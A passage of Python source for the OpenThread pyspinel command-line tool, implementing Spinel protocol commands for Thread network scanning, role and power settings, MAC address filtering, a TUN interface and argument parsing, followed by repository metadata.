> scan
| J | Network Name | Extended PAN | PAN | MAC Address | Ch | dBm | LQI |
+---+------------------+------------------+------+------------------+----+-----+-----+
| 0 | OpenThread | dead00beef00cafe | ffff | f1d92a82c8d8fe43 | 11 | -20 | 0 |
Done
"""
# Initial mock-up of scan
self.handle_property("15", SPINEL.PROP_MAC_SCAN_MASK)
self.handle_property("4", SPINEL.PROP_MAC_SCAN_PERIOD, 'H')
self.handle_property("1", SPINEL.PROP_MAC_SCAN_STATE)
time.sleep(5)
self.handle_property("", SPINEL.PROP_MAC_SCAN_BEACON, 'U')
def complete_thread(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for thread command. """
map_sub_commands = ('start', 'stop')
return [i for i in map_sub_commands if i.startswith(text)]
def do_thread(self, line):
"""
thread start
Enable Thread protocol operation and attach to a Thread network.
> thread start
Done
thread stop
Disable Thread protocol operation and detach from a Thread network.
> thread stop
Done
"""
map_arg_value = {
0: "stop",
1: "start",
}
map_arg_name = {
"stop": "0",
"start": "1",
}
if line:
try:
# remap string state names to integer
line = map_arg_name[line]
except:
print("Error")
return
result = self.prop_get_or_set_value(SPINEL.PROP_NET_STACK_UP, line)
if result != None:
if not line:
print(map_arg_value[result])
print("Done")
else:
print("Error")
def do_state(self, line):
"""
state
"""
map_arg_value = {
0: "detached",
1: "child",
2: "router",
3: "leader",
}
map_arg_name = {
"disabled": "0",
"detached": "0",
"child": "1",
"router": "2",
"leader": "3",
}
if line:
try:
# remap string state names to integer
line = map_arg_name[line]
except:
print("Error")
return
result = self.prop_get_or_set_value(SPINEL.PROP_NET_ROLE, line)
if result != None:
if not line:
state = map_arg_value[result]
# TODO: if state="disabled": get NET_STATE to determine
# whether "disabled" or "detached"
print(state)
print("Done")
else:
print("Error")
def do_txpower(self, line):
"""
txpower
Get the transmit power in dBm.
> txpower
0
Done
txpower <txpower>
Set the transmit power in dBm.
> txpower -10
Done
"""
self.handle_property(line, SPINEL.PROP_PHY_TX_POWER, mixed_format='b')
def do_version(self, line):
"""
version
Print the build version information.
> version
OPENTHREAD/gf4f2f04; Jul 1 2016 17:00:09
Done
"""
self.handle_property(line, SPINEL.PROP_NCP_VERSION, 'U')
def complete_macfilter(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for macfilter command. """
#TODO: autocomplete the secondary sub commands
#for 'addr': 'disable', 'denylist', 'allowlist', 'add', 'remove', 'clear'
#for 'rss' : 'add', 'remove', 'clear'
map_sub_commands = ('addr', 'rss')
return [i for i in map_sub_commands if i.startswith(text)]
def do_mac(self, line):
"""
mac
Mac related commands.
mac retries direct
Get the number of transmit retries on the MAC layer.
> mac retries direct
3
Done
mac retries direct <number>
Set the number of direct transmit retries on the MAC layer.
> mac retries direct 10
Done
mac retries indirect
Get the number of indirect transmit retries on the MAC layer.
> mac retries indirect
0
Done
mac retries indirect <number>
Set the number of indirect transmit retries on the MAC layer.
> mac retries indirect 5
Done
mac ccathreshold
Get the CCA ED Threshold in dBm.
> mac ccathreshold
-10
Done
mac ccathreshold -70
Set the CCA ED Threshold in dBm.
> mac ccathreshold -70
Done
"""
params = line.split(" ")
prop = None
if params[0] == "retries" and len(params) > 1:
if params[1] == "direct":
prop = SPINEL.PROP_MAC_MAX_RETRY_NUMBER_DIRECT
elif params[1] == "indirect":
prop = SPINEL.PROP_MAC_MAX_RETRY_NUMBER_INDIRECT
value = params[2] if len(params) == 3 else None
elif params[0] == "ccathreshold" and len(params) > 0:
prop = SPINEL.PROP_PHY_CCA_THRESHOLD
value = None
if len(params) == 2:
value = int(params[1])
self.prop_set(prop, value, mixed_format='b')
return
self.handle_property(value, prop)
def do_macfilter(self, line):
"""
macfilter
List the macfilter status, including address and received signal strength filter settings.
> macfilter
Allowlist
Done
macfilter addr
List the address filter status.
> macfilter addr
Allowlist
Done
macfilter addr disable
Disable address filter mode.
> macfilter addr disable
Done
macfilter addr allowlist
Enable allowlist address filter mode.
> macfilter addr allowlist
Done
macfilter addr denylist
Enable denylist address filter mode.
> macfilter addr denylist
Done
macfilter addr add <extaddr> [rssi]
Add an IEEE 802.15.4 Extended Address to the address filter.
> macfilter addr add dead00beef00cafe -85
Done
> macfilter addr add dead00beef00caff
Done
macfilter addr remove <extaddr>
Remove an IEEE 802.15.4 Extended Address from the address filter.
> macfilter addr remove dead00beef00caff
Done
macfilter addr clear
Clear all entries from the address filter.
> macfilter addr clear
Done
macfilter rss
List the rss filter status.
> macfilter rss
Done
macfilter rss add <extaddr> <rssi>
Set the received signal strength for the messages from the IEEE802.15.4 Extended Address.
If extaddr is \*, default received signal strength for all received messages would be set.
> macfilter rss add * -50
Done
> macfilter rss add 0f6127e33af6b404 -85
Done
macfilter rss remove <extaddr>
Removes the received signal strength or received link quality setting on the Extended Address.
If extaddr is \*, default received signal strength or link quality for all received messages would be unset.
> macfilter rss remove *
Done
> macfilter rss remove 0f6127e33af6b404
macfilter rss clear
Clear all the the received signal strength.
> macfilter rss clear
"""
map_arg_value = {
0: "Disabled",
1: "Allowlist",
2: "Denylist",
}
params = line.split(" ")
if params[0] == "":
mode = 0
value = self.prop_get_value(SPINEL.PROP_MAC_ALLOWLIST_ENABLED)
if value == 1:
mode = 1
else:
value = self.prop_get_value(SPINEL.PROP_MAC_DENYLIST_ENABLED)
if value == 1:
mode = 2
print(map_arg_value[mode])
# TODO: parse and show the content of entries
value = self.prop_get_value(SPINEL.PROP_MAC_ALLOWLIST)
value = self.prop_get_value(SPINEL.PROP_MAC_FIXED_RSS)
if params[0] == "addr":
if len(params) == 1:
mode = 0
value = self.prop_get_value(SPINEL.PROP_MAC_ALLOWLIST_ENABLED)
if value == 1:
mode = 1
else:
value = self.prop_get_value(
SPINEL.PROP_MAC_DENYLIST_ENABLED)
if value == 1:
mode = 2
print(map_arg_value[mode])
# TODO: parse and show the content of entries
value = self.prop_get_value(SPINEL.PROP_MAC_ALLOWLIST)
elif params[1] == "allowlist":
self.prop_set(SPINEL.PROP_MAC_ALLOWLIST_ENABLED, '1')
return
elif params[1] == "denylist":
self.prop_set(SPINEL.PROP_MAC_DENYLIST_ENABLED, '1')
return
elif params[1] == "disable":
self.prop_set(SPINEL.PROP_MAC_ALLOWLIST_ENABLED, '0')
return
elif params[1] == "add":
arr = util.hex_to_bytes(params[2])
try:
rssi = int(params[3])
except:
rssi = SPINEL.RSSI_OVERRIDE
arr += struct.pack('b', rssi)
self.prop_insert_value(SPINEL.PROP_MAC_ALLOWLIST, arr,
str(len(arr)) + 's')
elif params[1] == "remove":
arr = util.hex_to_bytes(params[2])
self.prop_remove_value(SPINEL.PROP_MAC_ALLOWLIST, arr,
str(len(arr)) + 's')
elif params[1] == "clear":
self.prop_set_value(SPINEL.PROP_MAC_ALLOWLIST, b'', '0s')
elif params[0] == "rss":
if len(params) == 1:
# TODO: parse and show the content of entries
value = self.prop_get_value(SPINEL.PROP_MAC_FIXED_RSS)
elif params[1] == "add":
if params[2] == "*":
arr = b''
else:
arr = util.hex_to_bytes(params[2])
rssi = int(params[3])
arr += struct.pack('b', rssi)
self.prop_insert_value(SPINEL.PROP_MAC_FIXED_RSS, arr,
str(len(arr)) + 's')
elif params[1] == "remove":
if params[2] == "*":
arr = b''
else:
arr = util.hex_to_bytes(params[2])
self.prop_remove_value(SPINEL.PROP_MAC_FIXED_RSS, arr,
str(len(arr)) + 's')
elif params[1] == "clear":
self.prop_set_value(SPINEL.PROP_MAC_FIXED_RSS, b'', '0s')
print("Done")
def do_ncpll64(self, line):
""" Display the link local IPv6 address. """
self.handle_property(line, SPINEL.PROP_IPV6_LL_ADDR, '6')
def do_ncpml64(self, line):
""" Display the mesh local IPv6 address. """
self.handle_property(line, SPINEL.PROP_IPV6_ML_ADDR, '6')
def do_ncpraw(self, line):
""" Enable MAC raw stream. """
self.handle_property(line, SPINEL.PROP_MAC_RAW_STREAM_ENABLED, 'B')
def do_ncpfilter(self, line):
"""
Set MAC filter mode:
0 = MAC_FILTER_MODE_NORMAL Normal MAC filtering is in place.
1 = MAC_FILTER_MODE_PROMISCUOUS All MAC packets matching network are passed up the stack.
2 = MAC_FILTER_MODE_MONITOR All decoded MAC packets are passed up the stack.
"""
self.handle_property(line, SPINEL.PROP_MAC_FILTER_MODE, 'B')
def complete_ncptun(self, text, _line, _begidx, _endidx):
""" Subcommand completion handler for ncp-tun command. """
map_sub_commands = ('up', 'down', 'add', 'remove', 'ping')
return [i for i in map_sub_commands if i.startswith(text)]
def do_ncptun(self, line):
"""
ncp-tun
Control sideband tunnel interface.
ncp-tun up
Bring up Thread TUN interface.
> ncp-tun up
Done
ncp-tun down
Bring down Thread TUN interface.
> ncp-tun down
Done
ncp-tun add <ipaddr>
Add an IPv6 address to the Thread TUN interface.
> ncp-tun add 2001::dead:beef:cafe
Done
ncp-tun del <ipaddr>
Delete an IPv6 address from the Thread TUN interface.
> ncp-tun del 2001::dead:beef:cafe
Done
ncp-tun ping <ipaddr> [size] [count] [interval]
Send an ICMPv6 Echo Request.
> ncp-tun ping fdde:ad00:beef:0:558:f56b:d688:799
16 bytes from fdde:ad00:beef:0:558:f56b:d688:799: icmp_seq=1 hlim=64 time=28ms
"""
params = line.split(" ")
num = len(params)
if num > 1:
ipaddr = params[1]
prefix = ipaddress.IPv6Interface(str(ipaddr))
_arr = prefix.ip.packed
if params[0] == "":
pass
elif params[0] == "add":
if self.tun_if:
self.tun_if.addr_add(ipaddr)
elif params[0] == "remove":
if self.tun_if:
self.tun_if.addr_del(ipaddr)
elif params[0] == "up":
if os.geteuid() == 0:
self.tun_if = TunInterface(self.nodeid)
else:
print("Warning: superuser required to start tun interface.")
elif params[0] == "down":
if self.tun_if:
self.tun_if.close()
self.tun_if = None
elif params[0] == "ping":
# Use tunnel to send ping
size = "56"
count = "1"
_interval = "1"
if len(params) > 1:
size = params[1]
if len(params) > 2:
count = params[2]
if len(params) > 3:
_interval = params[3]
if self.tun_if:
self.tun_if.ping6(" -c " + count + " -s " + size + " " + ipaddr)
print("Done")
def do_diag(self, line):
"""
Follows "mfg" command.
"""
self.do_mfg(line)
def _notify_simulator(self):
"""
notify the simulator that there are no more UART data for the current command.
"""
OT_SIM_EVENT_POSTCMD = 4
message = struct.pack('=QBHB', 0, OT_SIM_EVENT_POSTCMD, 1,
int(self.nodeid))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(self._addr)
sock.sendto(message, self._simulator_addr)
sock.close()
def postcmd(self, stop, line):
if self.VIRTUAL_TIME:
self._notify_simulator()
return stop
def parse_args():
"""" Send spinel commands to initialize sniffer node. """
args = sys.argv[1:]
opt_parser = optparse.OptionParser(usage=optparse.SUPPRESS_USAGE)
opt_parser.add_option("-u",
"--uart",
action="store",
dest="uart",
type="string")
opt_parser.add_option("-b",
"--baudrate",
action="store",
dest="baudrate",
type="int",
default=DEFAULT_BAUDRATE)
opt_parser.add_option("--rtscts",
action="store_true",
dest="rtscts",
default=False),
opt_parser.add_option("-p",
"--pipe",
action="store",
dest="pipe",
type="string")
opt_parser.add_option("-s",
"--socket",
action="store",
dest="socket",
type="string")
opt_parser.add_option("-n",
"--nodeid",
action="store",
dest="nodeid",
type="string",
default="1")
opt_parser.add_option("-q", "--quiet", action="store_true", dest="quiet")
opt_parser.add_option("-v",
"--verbose",
action="store_true",
dest="verbose")
opt_parser.add_option("-d",
"--debug",
action="store",
dest="debug",
type="int",
default=CONFIG.DEBUG_ENABLE)
opt_parser.add_option("--vendor-path",
action="store",
dest="vendor_path",
type="string")
return opt_parser.parse_args(args)
def main():
""" Top-level main for spinel-cli tool. """
(options, remaining_args) = parse_args()
if options.debug:
CONFIG.debug_set_level(options.debug)
# Obtain the vendor module path, if provided
if not options.vendor_path:
options.vendor_path = os.environ.get("SPINEL_VENDOR_PATH")
if options.vendor_path:
options.vendor_path = os.path.abspath(options.vendor_path)
vendor_path, vendor_module = os.path.split(options.vendor_path)
sys.path.insert(0, vendor_path)
else:
vendor_module = "vendor"
# Set default stream to pipe
stream_type = 'p'
stream_descriptor = "../../examples/apps/ncp/ot-ncp-ftd " + options.nodeid
if options.uart:
stream_type = 'u'
stream_descriptor = options.uart
elif options.socket:
stream_type = 's'
stream_descriptor = options.socket
elif options.pipe:
stream_type = 'p'
stream_descriptor = options.pipe
if options.nodeid:
stream_descriptor += " " + str(options.nodeid)
else:
if len(remaining_args) > 0:
stream_descriptor = " ".join(remaining_args)
stream = StreamOpen(stream_type, stream_descriptor, options.verbose,
options.baudrate, options.rtscts)
try:
vendor_ext = importlib.import_module(vendor_module + '.vendor')
cls = type(vendor_ext.VendorSpinelCliCmd.__name__,
(SpinelCliCmd, vendor_ext.VendorSpinelCliCmd), {})
shell = cls(stream, nodeid=options.nodeid, vendor_module=vendor_module)
except ImportError:
shell = SpinelCliCmd(stream,
nodeid=options.nodeid,
vendor_module=vendor_module)
try:
shell.cmdloop()
except KeyboardInterrupt:
CONFIG.LOGGER.info('\nCTRL+C Pressed')
if shell.wpan_api:
shell.wpan_api.stream.close()
if __name__ == "__main__":
main()
|
openthread/pyspinel
|
spinel-cli.py
|
Python
|
apache-2.0
| 73,319
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.